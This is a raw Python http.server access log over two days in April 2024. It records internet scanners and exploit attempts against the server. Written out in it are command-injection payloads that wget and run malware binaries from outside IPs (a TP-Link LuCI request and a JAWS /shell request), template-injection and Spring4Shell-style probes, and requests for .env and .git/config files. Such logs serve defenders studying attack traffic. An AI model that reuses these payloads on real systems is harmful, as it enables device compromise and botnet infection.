[12/Apr/2024 17:58:26] "GET /start.sh HTTP/1.1" 200 - 146.148.113.189 - - [12/Apr/2024 17:58:27] "GET /updateDNS.sh HTTP/1.1" 200 - 146.148.113.189 - - [12/Apr/2024 17:58:27] "GET /images/ HTTP/1.1" 200 - 146.148.113.189 - - [12/Apr/2024 17:58:28] "GET /images/0.png HTTP/1.1" 200 - 146.148.113.189 - - [12/Apr/2024 17:58:28] "GET /images/1.png HTTP/1.1" 200 - 146.148.113.189 - - [12/Apr/2024 17:58:29] "GET /images/2.png HTTP/1.1" 200 - 146.148.113.189 - - [12/Apr/2024 17:58:29] "GET /images/3.png HTTP/1.1" 200 - 146.148.113.189 - - [12/Apr/2024 17:58:30] "GET /images/4.png HTTP/1.1" 200 - 146.148.113.189 - - [12/Apr/2024 17:58:30] "GET /images/5.png HTTP/1.1" 200 - 146.148.113.189 - - [12/Apr/2024 17:58:31] "GET /images/6.png HTTP/1.1" 200 - 146.148.113.189 - - [12/Apr/2024 17:58:31] "GET /images/radar.png HTTP/1.1" 200 - 185.224.128.43 - - [12/Apr/2024 17:59:01] "GET / HTTP/1.1" 200 - 205.210.31.226 - - [12/Apr/2024 18:17:38] code 400, message Bad request version ('À\\x13À') 205.210.31.226 - - [12/Apr/2024 18:17:38] "\x16\x03\x01\x00î\x01\x00\x00ê\x03\x03W\x97\x90\x91\x90\x16hôÍ[f¶\x92q\x00ÓðIøê(Hh~a~ÿ°\x9fݾ4 1óUïaÄ7.?\x9eÎ\x14\x15\x1eLc\x7fÐ\x9fò°\x86¤\x9b\x09"¥¬{\x8co\x1a\x00&À+À/À,À0̨̩À\x09À\x13À" 400 - 205.210.31.226 - - [12/Apr/2024 18:17:39] code 400, message Bad request version ('À(À$À\\x14À') 205.210.31.226 - - [12/Apr/2024 18:17:39] "\x16\x03\x01\x00Ê\x01\x00\x00Æ\x03\x03qå6g\x85Á+$OÓéEÔß\x96mLýj?»ô\x17&:5¶;JðDX\x00\x00hÌ\x14Ì\x13À/À+À0À,À\x11À\x07À'À#À\x13À\x09À(À$À\x14À" 400 - 162.216.150.74 - - [12/Apr/2024 18:42:11] "GET / HTTP/1.1" 200 - 179.43.161.135 - - [12/Apr/2024 18:43:58] code 404, message File not found 179.43.161.135 - - [12/Apr/2024 18:43:58] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+ah%3B+wget+http%3A%2F%2F67.217.60.144%2Fah%3B+chmod+777+ah%3B+.%2Fah+tplink%3B+rm+-rf+ah) HTTP/1.1" 404 - 64.62.197.60 - - [12/Apr/2024 19:11:36] code 400, message Bad request version ('§³G\\x06') 64.62.197.60 - - [12/Apr/2024 19:11:36] "\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\x1a®Théêô/®rôW0ºf\x80\x85ø\x11yÌ9\x1e§³G\x06" 400 - 185.196.9.61 - - [12/Apr/2024 20:16:36] code 501, message Unsupported method ('POST') 185.196.9.61 - - [12/Apr/2024 20:16:36] "POST /?rest_route=/olistener/new HTTP/1.1" 501 - 185.196.9.61 - - [12/Apr/2024 20:16:39] code 404, message File not found 185.196.9.61 - - [12/Apr/2024 20:16:39] "GET /wp-content/plugins/woc-order-alert/assets/admin/js/scripts.js HTTP/1.1" 404 - 109.237.26.132 - - [12/Apr/2024 21:27:08] "GET / HTTP/1.1" 200 - 109.237.26.132 - - [12/Apr/2024 21:27:08] code 400, message Bad request version ('\\x00\\x04\\x03\\x00\\x01\\x02\\x00') 109.237.26.132 - - [12/Apr/2024 21:27:08] "\x16\x03\x01\x00ü\x01\x00\x00ø\x03\x03ãwµ9(ô+ë'tJ@Ï¿\x01¡iÏý9KÂe\x03]rº\x81à\x0bÈÑ ¸q¹\x91cºr[!è°\x09e\x1fÁ®/_W ¸\x83ýëÓý\x86\x07ún<¬\x00$\x13\x02\x13\x03\x13\x01À,À0À+À/̨̩À$À(À#À'\x00\x9f\x00\x9e\x00k\x00g\x00ÿ\x01\x00\x00\x8b\x00\x0b\x00\x04\x03\x00\x01\x02\x00" 400 - 109.237.26.132 - - [12/Apr/2024 21:27:09] code 400, message Bad request syntax ('\\x16\\x03\\x01\\x00ü\\x01\\x00\\x00ø\\x03\\x03\\x8e\\x05\\x03Õ\\x8f\\x9b²xHÀ\\x02¼\\x17\\x05ÁVl÷,\\x89') 109.237.26.132 - - [12/Apr/2024 21:27:09] "\x16\x03\x01\x00ü\x01\x00\x00ø\x03\x03\x8e\x05\x03Õ\x8f\x9b²xHÀ\x02¼\x17\x05ÁVl÷,\x89" 400 - 109.237.26.132 - - [12/Apr/2024 21:27:09] code 400, message Bad request version ('\\x00\\x04\\x03\\x00\\x01\\x02\\x00') 109.237.26.132 - - [12/Apr/2024 21:27:09] "\x16\x03\x01\x00ü\x01\x00\x00ø\x03\x03\x8f\x88­^OU\x9a\x1c®äv\x09Îöx\x9e\x0e\x06î\x9c*a|\x8e¹\x9c\x16D\x19Ä\x06Å \x13®\x83T¬ê\x94TÊCS\x90=\x9fwÿiòCý$-ã\x18C»\x07 ¬\x08½\x12\x00$\x13\x02\x13\x03\x13\x01À,À0À+À/̨̩À$À(À#À'\x00\x9f\x00\x9e\x00k\x00g\x00ÿ\x01\x00\x00\x8b\x00\x0b\x00\x04\x03\x00\x01\x02\x00" 400 - 87.121.69.52 - - [12/Apr/2024 21:35:03] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [12/Apr/2024 21:35:03] "CONNECT google.com:443 HTTP/1.1" 501 - 109.205.213.198 - - [12/Apr/2024 21:43:54] "GET / HTTP/1.1" 200 - 185.242.226.99 - - [12/Apr/2024 21:50:40] "GET / HTTP/1.1" 200 - 185.224.128.43 - - [12/Apr/2024 22:06:26] "GET / HTTP/1.1" 200 - 124.220.11.157 - - [12/Apr/2024 22:31:22] code 400, message Bad request version ('keep-alive\\\\r\\\\n\\\\r\\\\n\\x11') 124.220.11.157 - - [12/Apr/2024 22:31:22] "GET /shell?cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F45.95.147.201%2Fbins%2Farm7%3B%20chmod%20777%20arm7%3B%20.%2Farm7%20jaws%3B HTTP/1.1\\r\\nUser-Agent: Mozila/5.0\\r\\nHost: 127.0.0.1:80\\r\\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\\r\\nConnection: keep-alive\\r\\n\\r\\n\x11" 400 - 155.133.23.58 - - [12/Apr/2024 23:54:55] "GET / HTTP/1.0" 200 - 212.70.149.134 - - [13/Apr/2024 00:17:03] "GET / HTTP/1.0" 200 - 146.19.24.28 - - [13/Apr/2024 00:37:36] "GET / HTTP/1.1" 200 - 185.180.143.49 - - [13/Apr/2024 00:45:36] "GET / HTTP/1.1" 200 - 185.180.143.49 - - [13/Apr/2024 00:45:44] code 404, message File not found 185.180.143.49 - - [13/Apr/2024 00:45:44] "GET /ext-js/app/common/zld_product_spec.js HTTP/1.1" 404 - 165.154.172.88 - - [13/Apr/2024 01:00:49] "GET / HTTP/1.1" 200 - 165.154.172.88 - - [13/Apr/2024 01:00:49] code 400, message Bad request version ('À\\x13À') 165.154.172.88 - - [13/Apr/2024 01:00:49] "\x16\x03\x01\x00î\x01\x00\x00ê\x03\x03ÐW\x84¹-\x9bð\x8fÓ¿­õÇ\x87\x82ª\x9c(K²åÍÚÏ\x07ò\x98½®úu* 7\x85¸¸n\x95À\x02KCcè*íc\x0ci\x15µU×Ãö\x85\x06¼\x8b<%\x96Õ\x11\x00&À+À/À,À0̨̩À\x09À\x13À" 400 - 165.154.172.88 - - [13/Apr/2024 01:00:50] code 400, message Bad HTTP/0.9 request type ('t3') 165.154.172.88 - - [13/Apr/2024 01:00:50] "t3 12.1.2" 400 - 185.150.26.246 - - [13/Apr/2024 01:08:41] "GET / HTTP/1.1" 200 - 91.92.250.119 - - [13/Apr/2024 01:10:25] code 501, message Unsupported method ('POST') 91.92.250.119 - - [13/Apr/2024 01:10:25] "POST /login HTTP/1.1" 501 - 177.126.59.113 - - [13/Apr/2024 01:28:57] "GET / HTTP/1.1" 200 - 118.194.250.22 - - [13/Apr/2024 01:33:36] "GET / HTTP/1.1" 200 - 118.194.250.22 - - [13/Apr/2024 01:33:36] code 404, message File not found 118.194.250.22 - - [13/Apr/2024 01:33:36] "GET /favicon.ico HTTP/1.1" 404 - 118.194.250.22 - - [13/Apr/2024 01:33:37] code 404, message File not found 118.194.250.22 - - [13/Apr/2024 01:33:37] "GET /robots.txt HTTP/1.1" 404 - 118.194.250.22 - - [13/Apr/2024 01:33:37] code 404, message File not found 118.194.250.22 - - [13/Apr/2024 01:33:37] "GET /sitemap.xml HTTP/1.1" 404 - ---------------------------------------- Exception occurred during processing of request from ('45.79.163.53', 57433) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- 45.79.163.53 - - [13/Apr/2024 01:48:50] "GET / HTTP/1.1" 200 - 198.199.93.35 - - [13/Apr/2024 01:51:20] "GET / HTTP/1.1" 200 - ---------------------------------------- Exception occurred during processing of request from ('206.168.34.33', 49494) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- 206.168.34.33 - - [13/Apr/2024 02:02:04] "GET / HTTP/1.1" 200 - 206.168.34.33 - - [13/Apr/2024 02:02:08] "GET / HTTP/1.1" 200 - 206.168.34.33 - - [13/Apr/2024 02:02:08] code 505, message Invalid HTTP version (2.0) 206.168.34.33 - - [13/Apr/2024 02:02:08] "PRI * HTTP/2.0" 505 - 206.168.34.33 - - [13/Apr/2024 02:02:09] code 404, message File not found 206.168.34.33 - - [13/Apr/2024 02:02:09] "GET /favicon.ico HTTP/1.1" 404 - 185.196.9.61 - - [13/Apr/2024 02:16:07] code 404, message File not found 185.196.9.61 - - [13/Apr/2024 02:16:07] "GET /catalog-portal/ui/oauth/verify?error&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d HTTP/1.1" 404 - 194.50.16.190 - - [13/Apr/2024 02:19:01] "GET / HTTP/1.1" 200 - 185.196.9.61 - - [13/Apr/2024 02:21:01] code 501, message Unsupported method ('POST') 185.196.9.61 - - [13/Apr/2024 02:21:01] "POST /functionRouter HTTP/1.1" 501 - 192.155.90.118 - - [13/Apr/2024 02:22:45] "GET / HTTP/1.1" 200 - 192.155.90.118 - - [13/Apr/2024 02:22:46] "GET / HTTP/1.1" 200 - 31.220.1.83 - - [13/Apr/2024 02:35:04] "GET / HTTP/1.1" 200 - 77.247.16.46 - - [13/Apr/2024 02:35:41] "GET / HTTP/1.1" 200 - 107.170.236.5 - - [13/Apr/2024 02:39:39] "GET / HTTP/1.1" 200 - 185.196.9.61 - - [13/Apr/2024 02:47:40] code 501, message Unsupported method ('POST') 185.196.9.61 - - [13/Apr/2024 02:47:40] "POST /mgmt/tm/util/bash HTTP/1.1" 501 - 185.196.9.61 - - [13/Apr/2024 02:47:42] code 501, message Unsupported method ('POST') 185.196.9.61 - - [13/Apr/2024 02:47:42] "POST /mgmt/tm/util/bash HTTP/1.1" 501 - 45.125.66.34 - - [13/Apr/2024 03:01:21] code 501, message Unsupported method ('CONNECT') 45.125.66.34 - - [13/Apr/2024 03:01:21] "CONNECT google.com:443 HTTP/1.1" 501 - 106.75.5.52 - - [13/Apr/2024 03:36:04] code 404, message File not found 106.75.5.52 - - [13/Apr/2024 03:36:04] "GET /.DS_Store HTTP/1.1" 404 - 87.121.69.52 - - [13/Apr/2024 03:37:21] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [13/Apr/2024 03:37:21] "CONNECT google.com:443 HTTP/1.1" 501 - 216.219.94.195 - - [13/Apr/2024 03:38:48] code 404, message File not found 216.219.94.195 - - [13/Apr/2024 03:38:48] "GET /Kvsh/geti.php HTTP/1.1" 404 - 146.19.24.28 - - [13/Apr/2024 03:39:44] "GET / HTTP/1.1" 200 - 162.243.150.10 - - [13/Apr/2024 03:40:47] code 400, message Bad request syntax ('MGLNDD_194.193.213.117_80') 162.243.150.10 - - [13/Apr/2024 03:40:47] "MGLNDD_194.193.213.117_80" 400 - 185.196.9.61 - - [13/Apr/2024 03:44:10] code 501, message Unsupported method ('POST') 185.196.9.61 - - [13/Apr/2024 03:44:10] "POST /wp-admin/admin.php?page=html2wp-settings HTTP/1.1" 501 - 185.196.9.61 - - [13/Apr/2024 03:44:13] code 404, message File not found 185.196.9.61 - - [13/Apr/2024 03:44:13] "GET /wp-content/uploads/html2wp/2dvNUao7r2VyZTNjBxJKw5f2iT5.php HTTP/1.1" 404 - 35.240.121.17 - - [13/Apr/2024 04:11:58] "GET / HTTP/1.1" 200 - 185.224.128.43 - - [13/Apr/2024 04:12:05] "GET / HTTP/1.1" 200 - 45.227.254.8 - - [13/Apr/2024 05:05:37] code 400, message Bad HTTP/0.9 request type ('\\x03\\x00\\x00/*à\\x00\\x00\\x00\\x00\\x00Cookie:') 45.227.254.8 - - [13/Apr/2024 05:05:37] "\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 - 205.210.31.45 - - [13/Apr/2024 05:39:34] "GET / HTTP/1.1" 200 - 146.19.24.28 - - [13/Apr/2024 05:53:30] "GET / HTTP/1.1" 200 - 87.236.176.124 - - [13/Apr/2024 05:54:10] "GET / HTTP/1.1" 200 - 46.174.191.30 - - [13/Apr/2024 06:04:37] "GET / HTTP/1.0" 200 - 185.150.26.246 - - [13/Apr/2024 06:10:27] "GET / HTTP/1.1" 200 - 106.75.5.52 - - [13/Apr/2024 07:04:33] code 404, message File not found 106.75.5.52 - - [13/Apr/2024 07:04:33] "GET /.vscode/sftp.json HTTP/1.1" 404 - 185.150.26.246 - - [13/Apr/2024 08:07:46] "GET / HTTP/1.1" 200 - 109.205.213.198 - - [13/Apr/2024 08:31:05] "GET / HTTP/1.1" 200 - 185.224.128.43 - - [13/Apr/2024 08:41:53] "GET / HTTP/1.1" 200 - 93.184.148.3 - - [13/Apr/2024 08:44:40] "GET / HTTP/1.1" 200 - 185.196.9.61 - - [13/Apr/2024 09:05:40] code 501, message Unsupported method ('POST') 185.196.9.61 - - [13/Apr/2024 09:05:40] "POST /wp-admin/admin-ajax.php HTTP/1.1" 501 - 185.196.9.61 - - [13/Apr/2024 09:05:43] code 501, message Unsupported method ('POST') 185.196.9.61 - - [13/Apr/2024 09:05:43] "POST /wp-admin/admin-ajax.php HTTP/1.1" 501 - 185.196.9.61 - - [13/Apr/2024 09:05:46] code 404, message File not found 185.196.9.61 - - [13/Apr/2024 09:05:46] "GET /wp-content/plugins/stopbadbots/assets/js/stopbadbots.js HTTP/1.1" 404 - 185.196.9.61 - - [13/Apr/2024 09:20:20] code 404, message File not found 185.196.9.61 - - [13/Apr/2024 09:20:20] "GET /aj.html?a=devi HTTP/1.1" 404 - 146.19.24.28 - - [13/Apr/2024 09:21:29] "GET / HTTP/1.1" 200 - 146.19.24.28 - - [13/Apr/2024 10:07:46] "GET / HTTP/1.1" 200 - 162.216.150.49 - - [13/Apr/2024 10:41:17] "GET / HTTP/1.1" 200 - 185.196.9.61 - - [13/Apr/2024 11:02:07] code 404, message File not found 185.196.9.61 - - [13/Apr/2024 11:02:07] "GET /sap/admin/public/default.html HTTP/1.1" 404 - 185.196.9.61 - - [13/Apr/2024 11:02:07] code 404, message File not found 185.196.9.61 - - [13/Apr/2024 11:02:07] "GET /sap/public/bc/ur/Login/assets/corbu/sap_logo.png HTTP/1.1" 404 - 185.196.9.61 - - [13/Apr/2024 11:05:47] "GET /?location=search HTTP/1.1" 200 - 152.42.176.18 - - [13/Apr/2024 11:09:19] code 404, message File not found 152.42.176.18 - - [13/Apr/2024 11:09:19] "GET http://httpbin.org/ip HTTP/1.1" 404 - 104.152.52.204 - - [13/Apr/2024 11:10:49] "GET / HTTP/1.0" 200 - 146.19.24.28 - - [13/Apr/2024 11:25:35] "GET / HTTP/1.1" 200 - 202.26.144.61 - - [13/Apr/2024 11:27:06] "GET / HTTP/1.1" 200 - 106.75.18.235 - - [13/Apr/2024 11:34:27] code 404, message File not found 106.75.18.235 - - [13/Apr/2024 11:34:27] "GET /.git/config HTTP/1.1" 404 - 185.196.9.61 - - [13/Apr/2024 11:49:29] code 501, message Unsupported method ('POST') 185.196.9.61 - - [13/Apr/2024 11:49:29] "POST /cms/content/list HTTP/1.1" 501 - 185.196.9.61 - - [13/Apr/2024 11:53:54] code 501, message Unsupported method ('POST') 185.196.9.61 - - [13/Apr/2024 11:53:54] "POST /modules/appagebuilder/apajax.php?rand=5599126933272 HTTP/1.1" 501 - 185.196.9.61 - - [13/Apr/2024 11:53:57] code 404, message File not found 185.196.9.61 - - [13/Apr/2024 11:53:57] "GET /modules/appagebuilder/config.xml HTTP/1.1" 404 - 78.153.140.179 - - [13/Apr/2024 12:03:46] code 404, message File not found 78.153.140.179 - - [13/Apr/2024 12:03:46] "GET /.env HTTP/1.1" 404 - 78.153.140.179 - - [13/Apr/2024 12:03:46] code 400, message Bad HTTP/0.9 request type ('\\x16\\x03\\x01\\x00Þ\\x01\\x00\\x00Ú\\x03\\x03Ê·Æɲ´xKÝ)ƸA¯çè\\x03ìª\\x18\\x90êÞ*\\x843±\\x87ÿ\\x7f9Ë\\x00\\x00nÀ0À,À2À.À/À+À1À-\\x00¥\\x00£\\x00¡\\x00\\x9f\\x00¤\\x00¢\\x00') 78.153.140.179 - - [13/Apr/2024 12:03:46] "\x16\x03\x01\x00Þ\x01\x00\x00Ú\x03\x03Ê·Æɲ´xKÝ)ƸA¯çè\x03ìª\x18\x90êÞ*\x843±\x87ÿ\x7f9Ë\x00\x00nÀ0À,À2À.À/À+À1À-\x00¥\x00£\x00¡\x00\x9f\x00¤\x00¢\x00 \x00\x9eÀ(À$À\x14À" 400 - 185.196.9.61 - - [13/Apr/2024 12:08:24] code 404, message File not found 185.196.9.61 - - [13/Apr/2024 12:08:24] "GET /plugin HTTP/1.1" 404 - 185.196.9.61 - - [13/Apr/2024 12:25:41] code 501, message Unsupported method ('POST') 185.196.9.61 - - [13/Apr/2024 12:25:41] "POST /wp-admin/admin-ajax.php HTTP/1.1" 501 - 185.196.9.61 - - [13/Apr/2024 12:25:43] code 404, message File not found 185.196.9.61 - - [13/Apr/2024 12:25:43] "GET /wp-admin/admin-ajax.php?action=easync_success_and_save HTTP/1.1" 404 - 80.66.83.49 - - [13/Apr/2024 12:55:21] code 400, message Bad HTTP/0.9 request type ('\\x04\\x01\\x00\\x194eD') 80.66.83.49 - - [13/Apr/2024 12:55:21] "\x04\x01\x00\x194eD\x0b\x00" 400 - 80.66.83.49 - - [13/Apr/2024 12:56:22] code 400, message Bad request syntax ('\\x05\\x01\\x00') 80.66.83.49 - - [13/Apr/2024 12:56:22] "\x05\x01\x00" 400 - 80.66.83.49 - - [13/Apr/2024 12:56:22] code 501, message Unsupported method ('CONNECT') 80.66.83.49 - - [13/Apr/2024 12:56:22] "CONNECT hotmail-com.olc.protection.outlook.com:25 HTTP/1.1" 501 - 146.19.24.28 - - [13/Apr/2024 13:03:39] "GET / HTTP/1.1" 200 - 64.62.197.184 - - [13/Apr/2024 13:20:05] code 400, message Bad request version ('À\\x14À') 64.62.197.184 - - [13/Apr/2024 13:20:05] "\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\x8a`âÑC¡ÎÔ\x93\x84e\x80ÅÒ\x90.îÝ\x0cóy¿¾R&=§#Q̪\x07\x00\x00\x1aÀ/À+À\x11À\x07À\x13À\x09À\x14À" 400 - 66.240.205.34 - - [13/Apr/2024 13:35:55] code 400, message Bad request version ("x64|'|'|No|'|'|0.7d|'|'|..|'|'|AA==|'|'|112.inf|'|'|SGFjS2VkDQoxOTIuMTY4LjkyLjIyMjo1NTUyDQpEZXNrdG9wDQpjbGllbnRhLmV4ZQ0KRmFsc2UNCkZhbHNlDQpUcnVlDQpGYWxzZQ==12.act|'|'|AA==") 66.240.205.34 - - [13/Apr/2024 13:35:55] "145.ll|'|'|SGFjS2VkX0Q0OTkwNjI3|'|'|WIN-JNAPIER0859|'|'|JNapier|'|'|19-02-01|'|'||'|'|Win 7 Professional SP1 x64|'|'|No|'|'|0.7d|'|'|..|'|'|AA==|'|'|112.inf|'|'|SGFjS2VkDQoxOTIuMTY4LjkyLjIyMjo1NTUyDQpEZXNrdG9wDQpjbGllbnRhLmV4ZQ0KRmFsc2UNCkZhbHNlDQpUcnVlDQpGYWxzZQ==12.act|'|'|AA==" 400 - 185.224.128.43 - - [13/Apr/2024 13:56:03] "GET / HTTP/1.1" 200 - 109.205.213.198 - - [13/Apr/2024 13:57:38] "GET / HTTP/1.1" 200 - 205.210.31.89 - - [13/Apr/2024 14:11:39] "GET / HTTP/1.1" 200 - 185.196.9.61 - - [13/Apr/2024 14:13:56] code 501, message Unsupported method ('POST') 185.196.9.61 - - [13/Apr/2024 14:13:56] "POST /admin/login.php HTTP/1.1" 501 - 185.150.26.246 - - [13/Apr/2024 14:18:39] "GET / HTTP/1.1" 200 - 83.97.73.245 - - [13/Apr/2024 14:44:48] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 - 202.26.159.189 - - [13/Apr/2024 15:00:19] "GET / HTTP/1.1" 200 - 146.19.24.28 - - [13/Apr/2024 15:10:49] "GET / HTTP/1.1" 200 - 45.125.66.34 - - [13/Apr/2024 15:11:35] code 501, message Unsupported method ('CONNECT') 45.125.66.34 - - [13/Apr/2024 15:11:35] "CONNECT google.com:443 HTTP/1.1" 501 - 83.97.73.245 - - [13/Apr/2024 15:21:48] code 404, message File not found 83.97.73.245 - - [13/Apr/2024 15:21:48] "GET /actuator/gateway/routes HTTP/1.1" 404 - 146.19.24.28 - - [13/Apr/2024 15:34:17] "GET / HTTP/1.1" 200 - 198.235.24.144 - - [13/Apr/2024 16:27:12] code 400, message Bad request version ('À\\x13À') 198.235.24.144 - - [13/Apr/2024 16:27:12] "\x16\x03\x01\x00î\x01\x00\x00ê\x03\x03æ3\x0e¸\x05®M\x8dí¼ã®\x10ï>Q\x89;ðÀ[å-Æ\x16Ìî\x997´éF ï\x85_ÕU\x9bÞTÍ«oÁpt+\x84=a8:¶\x9d¥\x0f¦÷'²À¤jà\x00&À+À/À,À0̨̩À\x09À\x13À" 400 - 198.235.24.144 - - [13/Apr/2024 16:27:12] code 400, message Bad request syntax ('\\x16\\x03\\x01\\x00Ê\\x01\\x00\\x00Æ\\x03\\x03\\x8dK]') 198.235.24.144 - - [13/Apr/2024 16:27:12] "\x16\x03\x01\x00Ê\x01\x00\x00Æ\x03\x03\x8dK]" 400 - 185.196.9.61 - - [13/Apr/2024 16:39:21] code 501, message Unsupported method ('POST') 185.196.9.61 - - [13/Apr/2024 16:39:21] "POST /api.php HTTP/1.1" 501 - 185.196.9.61 - - [13/Apr/2024 17:06:42] code 501, message Unsupported method ('POST') 185.196.9.61 - - [13/Apr/2024 17:06:42] "POST / HTTP/1.1" 501 - 185.196.9.61 - - [13/Apr/2024 17:06:42] code 501, message Unsupported method ('POST') 185.196.9.61 - - [13/Apr/2024 17:06:42] "POST / HTTP/1.1" 501 - 185.196.9.61 - - [13/Apr/2024 17:06:42] "GET /?class.module.classLoader.resources.context.configFile=https://cnu5g6j332t368874ndgnnmjbww7xpgs1.oast.live&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1" 200 - 185.196.9.61 - - [13/Apr/2024 17:06:42] "GET /?class.module.classLoader.resources.context.configFile=http://cnu5g6j332t368874ndgmdhhzczok9pyk.oast.live&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1" 200 - 146.19.24.28 - - [13/Apr/2024 18:02:03] "GET / HTTP/1.1" 200 - 194.50.12.194 - - [13/Apr/2024 18:38:43] "GET / HTTP/1.1" 200 - 185.224.128.43 - - [13/Apr/2024 19:32:28] "GET / HTTP/1.1" 200 - 80.66.83.49 - - [13/Apr/2024 19:44:26] code 400, message Bad request syntax ('\\x04\\x01\\x00PPBS1\\x00') 80.66.83.49 - - [13/Apr/2024 19:44:26] "\x04\x01\x00PPBS1\x00" 400 - 80.66.83.49 - - [13/Apr/2024 19:45:03] code 400, message Bad request syntax ('\\x05\\x01\\x00') 80.66.83.49 - - [13/Apr/2024 19:45:03] "\x05\x01\x00" 400 - 80.66.83.49 - - [13/Apr/2024 19:46:08] code 400, message Bad request syntax ('\\x04\\x01\\x00PPBS1\\x00') 80.66.83.49 - - [13/Apr/2024 19:46:08] "\x04\x01\x00PPBS1\x00" 400 - 80.66.83.49 - - [13/Apr/2024 19:47:08] code 400, message Bad request syntax ('\\x05\\x01\\x00') 80.66.83.49 - - [13/Apr/2024 19:47:08] "\x05\x01\x00" 400 - 80.66.83.49 - - [13/Apr/2024 19:47:08] code 501, message Unsupported method ('CONNECT') 80.66.83.49 - - [13/Apr/2024 19:47:08] "CONNECT 80.66.83.49:80 HTTP/1.1" 501 - 146.19.24.28 - - [13/Apr/2024 19:58:44] "GET / HTTP/1.1" 200 - 185.196.9.61 - - [13/Apr/2024 20:04:57] code 501, message Unsupported method ('POST') 185.196.9.61 - - [13/Apr/2024 20:04:57] "POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1" 501 - 185.196.9.61 - - [13/Apr/2024 20:04:59] code 404, message File not found 185.196.9.61 - - [13/Apr/2024 20:04:59] "GET /OA_CGI/FNDWRR.exe HTTP/1.1" 404 - 185.196.9.61 - - [13/Apr/2024 20:05:02] code 501, message Unsupported method ('POST') 185.196.9.61 - - [13/Apr/2024 20:05:02] "POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1" 501 - 185.196.9.61 - - [13/Apr/2024 20:06:54] code 501, message Unsupported method ('POST') 185.196.9.61 - - [13/Apr/2024 20:06:54] "POST /login.php HTTP/1.1" 501 - 185.196.9.61 - - [13/Apr/2024 20:08:26] code 404, message File not found 185.196.9.61 - - [13/Apr/2024 20:08:26] "GET /zabbix/index_sso.php HTTP/1.1" 404 - 185.196.9.61 - - [13/Apr/2024 20:08:29] code 404, message File not found 185.196.9.61 - - [13/Apr/2024 20:08:29] "GET /index_sso.php HTTP/1.1" 404 - 185.196.9.61 - - [13/Apr/2024 20:11:51] code 404, message File not found 185.196.9.61 - - [13/Apr/2024 20:11:51] "GET /wp-content/plugins/vr-calendar-sync/assets/js/public.js HTTP/1.1" 404 - 185.196.9.61 - - [13/Apr/2024 20:11:53] code 404, message File not found 185.196.9.61 - - [13/Apr/2024 20:11:53] "GET /wp-admin/admin-post.php?vrc_cmd=phpinfo HTTP/1.1" 404 - 146.19.24.28 - - [13/Apr/2024 20:52:17] "GET / HTTP/1.1" 200 - 185.196.9.61 - - [13/Apr/2024 20:52:28] code 501, message Unsupported method ('POST') 185.196.9.61 - - [13/Apr/2024 20:52:28] "POST /geoserver/wms HTTP/1.1" 501 - ---------------------------------------- Exception occurred during processing of request from ('206.168.34.51', 46798) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- 206.168.34.51 - - [13/Apr/2024 21:01:21] "GET / HTTP/1.1" 200 - 206.168.34.51 - - [13/Apr/2024 21:01:25] "GET / HTTP/1.1" 200 - 206.168.34.51 - - [13/Apr/2024 21:01:25] code 505, message Invalid HTTP version (2.0) 206.168.34.51 - - [13/Apr/2024 21:01:25] "PRI * HTTP/2.0" 505 - 206.168.34.51 - - [13/Apr/2024 21:01:26] code 404, message File not found 